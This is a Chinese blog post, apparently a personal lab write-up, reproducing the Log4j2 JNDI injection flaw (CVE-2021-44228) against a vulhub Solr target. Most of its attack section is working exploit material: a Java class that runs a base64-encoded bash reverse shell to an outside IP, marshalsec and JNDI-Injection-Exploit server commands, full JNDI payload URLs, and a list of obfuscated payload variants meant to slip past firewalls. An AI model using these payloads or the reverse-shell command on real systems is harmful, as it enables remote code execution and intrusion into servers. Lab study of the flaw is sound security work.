<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="什么是log4j2 Log4j2是Apache的一个开源项目，通过使用Log4j2，我们可以控制日志信息输送的目的地是控制台、文件、GUI组件，甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等；我们也可以控制每一条日志的输出格式；通过定义每一条日志信息的级别，我们能够更加细致地…">
<meta property="og:type" content="article">
<meta property="og:title" content="log4j2">
<meta property="og:url" content="http://example.com/2026/09/16/09-log4j2/index.html">
<meta property="og:site_name" content="Glut4micum">
<meta property="og:description" content="什么是log4j2 Log4j2是Apache的一个开源项目，通过使用Log4j2，我们可以控制日志信息输送的目的地是控制台、文件、GUI组件，甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等；我们也可以控制每一条日志的输出格式；通过定义每一条日志信息的级别，我们能够更加细致地…">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/6341d5f1-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/5df21813-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/e723cb5c-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/32bf2f8f-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/ea6dbbf3-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/52bec4eb-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/f4d59255-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/1db0123c-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/a9a9b23c-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/5fa3ed54-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/1f177781-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/442f76fe-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/dc18f781-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/00a0ce9f-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/93cd22b9-image.png">
<meta property="article:published_time" content="2026-09-16T13:58:17.000Z">
<meta property="article:modified_time" content="2026-09-16T13:58:17.000Z">
<meta property="article:author" content="谷氨酸棒状杆菌">
<meta property="article:tag" content="Log4j2">
<meta property="article:tag" content="漏洞复现">
<meta property="article:tag" content="RCE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/6341d5f1-image.png">

<link rel="canonical" href="http://example.com/2026/09/16/09-log4j2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>log4j2 | Glut4micum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Glut4micum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/09/16/09-log4j2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="谷氨酸棒状杆菌">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Glut4micum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          log4j2
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-09-16 21:58:17" itemprop="dateCreated datePublished" datetime="2026-09-16T21:58:17+08:00">2026-09-16</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">知识笔记</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="本文总阅读两 fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">什么是log4j2 Log4j2是Apache的一个开源项目，通过使用Log4j2，我们可以控制日志信息输送的目的地是控制台、文件、GUI组件，甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等；我们也可以控制每一条日志的输出格式；通过定义每一条日志信息的级别，我们能够更加细致地…</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="log4j2"><a href="#log4j2" class="headerlink" title="log4j2"></a>log4j2</h1><h1 id="什么是log4j2"><a href="#什么是log4j2" class="headerlink" title="什么是log4j2"></a>什么是log4j2</h1><p>Log4j2是Apache的一个开源项目，通过使用Log4j2，我们可以控制日志信息输送的目的地是控制台、文件、GUI组件，甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等；我们也可以控制每一条日志的输出格式；通过定义每一条日志信息的级别，我们能够更加细致地控制日志的生成过程。</p>
<p>这些可以通过一个配置文件来灵活地进行配置，而不需要修改应用的代码</p>
<h1 id="log4j2-jndi注入复现-CVE-2021-44228"><a href="#log4j2-jndi注入复现-CVE-2021-44228" class="headerlink" title="log4j2 jndi注入复现(CVE-2021-44228)"></a>log4j2 jndi注入复现(CVE-2021-44228)</h1><p>利用是搭建的vulhub靶场</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">git clone https:<span class="comment">//github.com/vulhub/vulhub.git//拉取镜像</span></span><br><span class="line"><span class="comment">//然后进入vulhb目录就可以看到不同的漏洞了</span></span><br><span class="line">进入log4j/CVE-<span class="number">2021</span>-<span class="number">44228</span></span><br><span class="line">docker-compose up -d<span class="comment">//开启靶场</span></span><br><span class="line">docker-compose ps<span class="comment">//查看端口号</span></span><br><span class="line">ifconfig查看IP后加上端口号就进入了</span><br><span class="line"></span><br><span class="line">文件路径在/usr/local</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/yuque-notes/02-Knowledge%20Book/assets/6341d5f1-image.png" alt="image.png"></p>
<p>接下来进行漏洞探测</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/5df21813-image.png" alt="image.png"></p>
<p>url上面发同样的payload不知道为什么dnslog没有反应，换了一种方法，利用工具postman来发</p>
<p>​</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/e723cb5c-image.png" alt="image.png"></p>
<p>回显了Java的版本1.8.0_102，这样我们就可以探测出是存在漏洞点的，payload：<code>?action=${jndi:ldap://${sys:java.version}.7zw40l.dnslog.cn}</code></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>打反弹shell</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/32bf2f8f-image.png" alt="image.png"></p>
<p>对命令进行编码</p>
<p>[bookmarklink]</p>
<h2 id="法1，Java反序列化"><a href="#法1，Java反序列化" class="headerlink" title="法1，Java反序列化"></a>法1，Java反序列化</h2><p>然后就可以写我们的exp</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Exp</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Exp</span><span class="params">()</span>&#123;</span><br><span class="line">        <span class="keyword">try</span>&#123;</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTguMjMuMTQ4LjUxLzc3NzcgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span>);</span><br><span class="line">        &#125;<span class="keyword">catch</span>(Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] argv)</span>&#123;</span><br><span class="line">        <span class="type">Exp</span> <span class="variable">e</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Exp</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/yuque-notes/02-Knowledge%20Book/assets/ea6dbbf3-image.png" alt="image.png"></p>
<p>将编写好的脚本上传到攻击机上去</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/52bec4eb-image.png" alt="image.png"></p>
<p>进入我们存放class文件的目录下，运行python3 -m http.server 4444，将class文件映射出来</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/f4d59255-image.png" alt="image.png"></p>
<p>下载工具编译jar包</p>
<p><code>git clone https://github.com/mbechler/marshalsec.git</code></p>
<p>进入marshalsec目录，运行<code>mvn clean package -Dmaven.test.skip=true</code></p>
<p>进入target文件中运行下面的命令</p>
<p>使用marshalsec工具，开启RMI服务，监听1389端口，并指向我们恶意代码文件地址</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp marshalsec-<span class="number">0.0</span><span class="number">.3</span>-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  <span class="string">&quot;http://198.23.148.51:4444/#Exp&quot;</span> <span class="number">1389</span></span><br></pre></td></tr></table></figure>

<p>payload<code>http://198.23.148.51:8983/solr/admin/cores?action=${jndi:ldap://198.23.148.51:1389/Exp}</code>GET传参即可</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/1db0123c-image.png" alt="image.png"></p>
<p>监听反弹shell端口</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/a9a9b23c-image.png" alt="image.png"></p>
<p>ldap监听情况</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/5fa3ed54-image.png" alt="image.png"></p>
<p>开放的4444端口情况</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/1f177781-image.png" alt="image.png"></p>
<p>反弹shell也收到了</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/442f76fe-image.png" alt="image.png"></p>
<h2 id="法2"><a href="#法2" class="headerlink" title="法2"></a>法2</h2><p><code>git clone https://github.com/welk1n/JNDI-Injection-Exploit.git</code></p>
<p>利用工具JNDI-Injection-Exploit，在虚拟机上面下载好，环境需求Java，Maven</p>
<p>然后配置好环境，安装好后进入JNDI-Injection-Exploit文件内，运行命令<code>mvn clean package -DskipTests</code>，在target文件夹生成.jar文件</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">原命令</span><br><span class="line">java -jar JNDI-Injection-Exploit-<span class="number">1.0</span>-SNAPSHOT-all.jar -C <span class="string">&quot;转化后的bash编码命令&quot;</span> -A <span class="string">&quot;攻击机/监听机/本机&quot;</span></span><br><span class="line"> </span><br><span class="line">反弹shell的命令（编码前）</span><br><span class="line">bash -i &gt;&amp; /dev/tcp/<span class="number">198.23</span><span class="number">.148</span><span class="number">.51</span>/<span class="number">7777</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span></span><br><span class="line">反弹shell的命令（编码后）</span><br><span class="line">bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTguMjMuMTQ4LjUxLzc3NzcgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;</span><br><span class="line"></span><br><span class="line">java -jar JNDI-Injection-Exploit-<span class="number">1.0</span>-SNAPSHOT-all.jar -C <span class="string">&quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTguMjMuMTQ4LjUxLzc3NzcgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span> -A <span class="string">&quot;198.23.148.51&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/yuque-notes/02-Knowledge%20Book/assets/dc18f781-image.png" alt="image.png"></p>
<p>payload：访问<code>http://198.23.148.51:8983/solr/admin/cores?action=${jndi:rmi://198.23.148.51:1099/br9bad}</code>&#x2F;&#x2F;选择这个的原因是我们一开始dns得到的版本是JDK1.8</p>
<p>或者<code>http://198.23.148.51:8983/solr/admin/cores?action=${jndi:ldap://198.23.148.51:1099/br9bad}</code></p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/00a0ce9f-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/93cd22b9-image.png" alt="image.png"></p>
<p>成功获取shell</p>
<h1 id="log4j解析-存在递归操作实现绕过防火墙"><a href="#log4j解析-存在递归操作实现绕过防火墙" class="headerlink" title="log4j解析${}存在递归操作实现绕过防火墙"></a>log4j解析${}存在递归操作实现绕过防火墙</h1><p>假如传入的是${11111${222222}333333}，他会先执行${222222}然后将数据替换回去，变成${11111XXXXXX333333}来继续执行，所以执行的顺序是从里到外</p>
<p>可以通过log4j2的代码特性来实现对防火墙的绕过操作</p>
<h2 id="相关变形payload"><a href="#相关变形payload" class="headerlink" title="相关变形payload"></a>相关变形payload</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$&#123;jndi:ldap:<span class="comment">//127.0.0.1:1389/a&#125;</span></span><br><span class="line">$&#123;$&#123;::-j&#125;$&#123;::-n&#125;$&#123;::-d&#125;$&#123;::-i&#125;:$&#123;::-r&#125;$&#123;::-m&#125;$&#123;::-i&#125;:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;$&#123;::-j&#125;ndi:rmi:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;jndi:rmi:<span class="comment">//ceye.io&#125;</span></span><br><span class="line">$&#123;$&#123;lower:jndi&#125;:$&#123;lower:rmi&#125;:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;$&#123;lower:$&#123;lower:jndi&#125;&#125;:$&#123;lower:rmi&#125;:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;$&#123;lower:j&#125;$&#123;lower:n&#125;$&#123;lower:d&#125;i:$&#123;lower:rmi&#125;:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;$&#123;lower:j&#125;$&#123;upper:n&#125;$&#123;lower:d&#125;$&#123;upper:i&#125;:$&#123;lower:r&#125;m$&#123;lower:i&#125;&#125;:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;$&#123;upper:jndi&#125;:$&#123;upper:rmi&#125;:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;$&#123;upper:j&#125;$&#123;upper:n&#125;$&#123;lower:d&#125;i:$&#123;upper:rmi&#125;:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;$&#123;upper:j&#125;$&#123;upper:n&#125;$&#123;upper:d&#125;$&#123;upper:i&#125;:$&#123;lower:r&#125;m$&#123;lower:i&#125;&#125;:<span class="comment">//ceye.io/a&#125;</span></span><br><span class="line">$&#123;$&#123;::-j&#125;$&#123;::-n&#125;$&#123;::-d&#125;$&#123;::-i&#125;:$&#123;::-l&#125;$&#123;::-d&#125;$&#123;::-a&#125;$&#123;::-p&#125;:<span class="comment">//$&#123;hostName&#125;.ceye.io&#125;</span></span><br><span class="line">$&#123;$&#123;upper::-j&#125;$&#123;upper::-n&#125;$&#123;::-d&#125;$&#123;upper::-i&#125;:$&#123;upper::-l&#125;$&#123;upper::-d&#125;$&#123;upper::-a&#125;$&#123;upper::-p&#125;:<span class="comment">//$&#123;hostName&#125;.ceye.io&#125;</span></span><br><span class="line">$&#123;$&#123;::-j&#125;$&#123;::-n&#125;$&#123;::-d&#125;$&#123;::-i&#125;:$&#123;::-l&#125;$&#123;::-d&#125;$&#123;::-a&#125;$&#123;::-p&#125;:<span class="comment">//$&#123;hostName&#125;.$&#123;env:COMPUTERNAME&#125;.$&#123;env:USERDOMAIN&#125;.$&#123;env&#125;.ceye.io</span></span><br></pre></td></tr></table></figure>

<p>来看一下这个例子的解析<code>${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://ceye.io/a}</code></p>
<p>从里到外，因此会先执行<code>${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://ceye.io/a</code>,接着就是递归调用，处理<code>${::-j}</code>,<code>${::-n}</code>这样的字符串</p>
<p>传入的就是<code>::-j</code>，由于他没有了相关的标识符<code>${}</code>，所以就直接进行了解析操作，因为<code>:-</code>作为分隔，所以主键是<code>:</code>,值是<code>j</code>，接着就会把<code>${::-j}</code>字符串替换为<code>j</code>，以此类推，最终获得的字符串就是<code>jndi:rmi://ceye.io/a</code></p>
<p>​</p>
<hr>
<p>来源: <a target="_blank" rel="noopener" href="https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/tgmkudnrof4tahvl">https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/tgmkudnrof4tahvl</a><br>语雀文档ID: 191953074</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Log4j2/" rel="tag"># Log4j2</a>
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag"># 漏洞复现</a>
              <a href="/tags/RCE/" rel="tag"># RCE</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/09/16/08-java%E5%8F%8D%E5%B0%84%E6%9C%BA%E5%88%B6/" rel="prev" title="java反射机制">
      <i class="fa fa-chevron-left"></i> java反射机制
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/09/16/10-VBS%E5%90%AF%E5%8A%A8/" rel="next" title="VBS启动">
      VBS启动 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#log4j2"><span class="nav-number">1.</span> <span class="nav-text">log4j2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFlog4j2"><span class="nav-number">2.</span> <span class="nav-text">什么是log4j2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#log4j2-jndi%E6%B3%A8%E5%85%A5%E5%A4%8D%E7%8E%B0-CVE-2021-44228"><span class="nav-number">3.</span> <span class="nav-text">log4j2 jndi注入复现(CVE-2021-44228)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">3.1.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%951%EF%BC%8CJava%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">3.2.</span> <span class="nav-text">法1，Java反序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%952"><span class="nav-number">3.3.</span> <span class="nav-text">法2</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#log4j%E8%A7%A3%E6%9E%90-%E5%AD%98%E5%9C%A8%E9%80%92%E5%BD%92%E6%93%8D%E4%BD%9C%E5%AE%9E%E7%8E%B0%E7%BB%95%E8%BF%87%E9%98%B2%E7%81%AB%E5%A2%99"><span class="nav-number">4.</span> <span class="nav-text">log4j解析${}存在递归操作实现绕过防火墙</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B8%E5%85%B3%E5%8F%98%E5%BD%A2payload"><span class="nav-number">4.1.</span> <span class="nav-text">相关变形payload</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="谷氨酸棒状杆菌"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">谷氨酸棒状杆菌</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">64</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">94</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Glut4micum" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Glut4micum" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">谷氨酸棒状杆菌</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div> -->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总访客量 fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总阅读量 fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<canvas id="particles-canvas"></canvas>


<button class="theme-switch-btn" id="themeSwitchBtn" title="切换明暗模式" aria-label="切换明暗模式">
  <i class="icon-moon fa fa-moon"></i>
  <i class="icon-sun fa fa-sun"></i>
</button>


<audio id="bgMusic" preload="none"></audio>

<script>
(function () {
  // ========== 明暗模式 ==========
  var rootEl = document.documentElement;
  var STORAGE_KEY = 'blog-theme';

  function applyTheme(theme) {
    rootEl.setAttribute('data-theme', theme);
    try { localStorage.setItem(STORAGE_KEY, theme); } catch (e) {}
  }

  var saved;
